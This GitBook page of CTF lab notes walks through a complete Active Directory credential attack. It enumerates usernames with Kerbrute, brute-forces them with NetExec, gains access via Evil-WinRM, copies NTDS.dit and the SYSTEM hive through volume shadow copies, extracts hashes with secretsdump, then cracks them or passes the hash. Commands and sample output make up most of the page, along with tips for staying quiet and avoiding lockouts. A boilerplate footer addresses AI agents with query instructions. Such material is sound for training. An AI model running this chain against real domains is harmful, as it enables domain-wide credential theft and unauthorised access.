> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-active-directory-and-ntds.dit.md).

# Attacking Active Directory & NTDS.dit

### Background

**Active Directory (AD)** is the directory service used in virtually every enterprise Windows environment. When a Windows system is domain-joined, it no longer validates logons against the local SAM database — it sends authentication requests to the **Domain Controller (DC)** instead.

> **Exception:** Local accounts can still be used by specifying `HOSTNAME\username` or `.\username` at the logon prompt, even on domain-joined machines.

**NTDS.dit** is the primary AD database file stored on every DC at:

```
%SystemRoot%\NTDS\NTDS.dit
```

It contains every domain account's username, NT hash, and AD schema. Dumping it = compromising every account in the domain.

> **Note:** Like SAM, NTDS.dit hashes are encrypted with a key stored in the SYSTEM hive. You need **both** `NTDS.dit` and `SYSTEM` to extract hashes.

***

### Phase 1 — Username Enumeration & Wordlist Creation

Before brute-forcing passwords, you need valid usernames. Guessing wrong usernames wastes time and generates more noise.

#### OSINT: Common username naming conventions

| Convention                        | Example (Jane Jill Doe) |
| --------------------------------- | ----------------------- |
| firstinitiallastname              | jdoe                    |
| firstinitialmiddleinitiallastname | jjdoe                   |
| firstnamelastname                 | janedoe                 |
| firstname.lastname                | jane.doe                |
| lastname.firstname                | doe.jane                |

**Tips:**

* Email addresses often reveal the username format (e.g. `jdoe@company.com` → username is `jdoe`)
* Google dork: `"@company.com"` to find email addresses
* Google dork: `site:company.com filetype:pdf` — PDF metadata sometimes contains usernames
* Some orgs alias internal usernames (e.g. `a907` → `joe.smith`) to prevent spraying — email gets through but internal username isn't exposed

#### Automated username generation with Username Anarchy

```bash
./username-anarchy -i /path/to/names.txt
```

Generates all common username format combinations from a list of real names.

#### Validating usernames with Kerbrute (before spraying)

Kerbrute uses Kerberos pre-authentication to enumerate valid usernames **without triggering logon failures** — much quieter than directly attempting SMB logins.

<mark style="color:orange;">**IMPORTANT: Use Hydra or NetExec in case of no domain name**</mark>

```bash
./kerbrute_linux_amd64 userenum --dc <DC_IP> --domain <domain> usernames.txt
```

**Example:**

```bash
./kerbrute_linux_amd64 userenum --dc 10.129.201.57 --domain inlanefreight.local names.txt
```

Output confirms valid usernames:

```
[+] VALID USERNAME: bwilliamson@inlanefreight.local
```

> Confirm valid usernames with Kerbrute **before** attempting password attacks. Reduces noise and avoids wasting attempts on nonexistent accounts.

***

### Phase 2 — Brute-Force / Password Spray with NetExec

Once you have valid usernames, use **NetExec** over SMB to attempt logins against the DC.

```bash
netexec smb <DC_IP> -u <username> -p <wordlist>
```

**Example:**

```bash
netexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt
```

**Reading output:**

* `[-] STATUS_LOGON_FAILURE` → wrong password, keep going
* `[+] domain\user:password` → success
* `(Pwn3d!)` → user has admin rights on the target

> **⚠️ Account Lockout:** Check if a lockout policy is in place before brute-forcing a single account. Default Windows domain policy has **no lockout** — but this varies by org. Password spraying (one password across many users) is safer.

**Event logs generated (Windows Event ID 4776)** — Security log on DC will show every failed logon. Useful to mention in reports for remediation recommendations.

***

### Phase 3 — Access the DC & Verify Privileges

With valid credentials, connect to the DC via Evil-WinRM (uses WinRM + PowerShell Remoting):

```bash
evil-winrm -i <DC_IP> -u <username> -p '<password>'
```

**Check local group memberships:**

```cmd
net localgroup
```

**Check domain privileges for the user:**

```cmd
net user bwilliamson
```

Look for `Domain Admins` or `Administrators` under **Global Group memberships** — required to dump NTDS.dit.

***

### Phase 4 — Capturing NTDS.dit

NTDS.dit is **actively in use** by AD — you can't simply copy it. Use **Volume Shadow Copy (VSS)** to snapshot the drive first.

#### Method A — Manual (VSS + Evil-WinRM)

**Step 1: Create a VSS snapshot of C:**

```powershell
vssadmin CREATE SHADOW /For=C:
```

Note the `Shadow Copy Volume Name` from the output (e.g. `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2`).

**Step 2: Copy NTDS.dit from the shadow copy:**

```cmd
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
```

**Step 3: Also grab SYSTEM hive** (needed to decrypt hashes):

```cmd
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM c:\NTDS\SYSTEM
```

**Step 4: Transfer both files to your attack host** via SMB share or other file transfer method.

***

#### Method B — One-liner with NetExec (faster)

```bash
netexec smb <DC_IP> -u <username> -p <password> -M ntdsutil
```

NetExec handles VSS creation, NTDS.dit extraction, and exfil automatically. Dumps hashes directly to your terminal and saves to:

```
/home/<user>/.nxc/logs/<DC>_<IP>_<date>.ntds
```

To filter only enabled accounts from the output file:

```bash
grep -iv disabled <output_file>.ntds | cut -d ':' -f1
```

***

### Phase 5 — Extract Hashes with secretsdump

If you used the manual method and have both files locally:

```bash
impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
```

**Output format:**

```
username:RID:LMhash:NThash:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
```

* **LM hash:** `aad3b435b51404eeaad3b435b51404ee` = empty/disabled (this is the LM hash for a blank password — effectively means LM is not in use)
* **NT hash:** the 32-char hash after the third colon — this is what you crack or use for PtH

***

### Phase 6 — Crack or Pass the Hash

#### Option A — Crack with Hashcat (mode 1000)

```bash
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
```

For multiple hashes, save all NT hashes to a file and point Hashcat at it:

```bash
sudo hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
```

#### Option B — Pass the Hash (PtH) with Evil-WinRM

If cracking fails, use the NT hash directly for authentication — no plaintext password needed:

```bash
evil-winrm -i <DC_IP> -u Administrator -H 64f12cddaa88057e06a81b54e73b949b
```

> NTLM authentication accepts a hash in place of a password — the protocol hashes the password before sending it anyway, so the hash *is* the credential. Full PtH coverage is in the AD Enumeration and Attacks module.

***

### Full Attack Chain Summary

```
OSINT (names) → username-anarchy (wordlist) → Kerbrute (validate)
    → NetExec SMB brute-force → Evil-WinRM (foothold)
    → Verify DA/Admin rights → VSS snapshot
    → Copy NTDS.dit + SYSTEM → secretsdump (extract hashes)
    → Hashcat (crack) or PtH (use directly)
```

***

### Key Points

* **Why VSS?** NTDS.dit is locked by AD while it's running. VSS creates a consistent snapshot you can safely copy without stopping AD.
* **Always grab SYSTEM alongside NTDS.dit.** The encryption key lives there. Without it, secretsdump can't extract anything.
* **NetExec `-M ntdsutil` is the fast path** in a real engagement — one command replaces the entire manual VSS chain.
* **Kerbrute before brute-force** — validates usernames via Kerberos without generating 4776 logon failure events.
* **LM hash `aad3b435...`** in secretsdump output = LM disabled, ignore it. The NT hash is what matters.
* **`(Pwn3d!)`** in NetExec output = account has local admin on that target. If you see this on the DC, you're already in.
* **Account lockout default = none** in standard Windows domain GPO, but always verify before spraying a single account.
* **PtH is the fallback** when cracking fails — an uncracked NT hash is still a valid credential for lateral movement.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-active-directory-and-ntds.dit.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
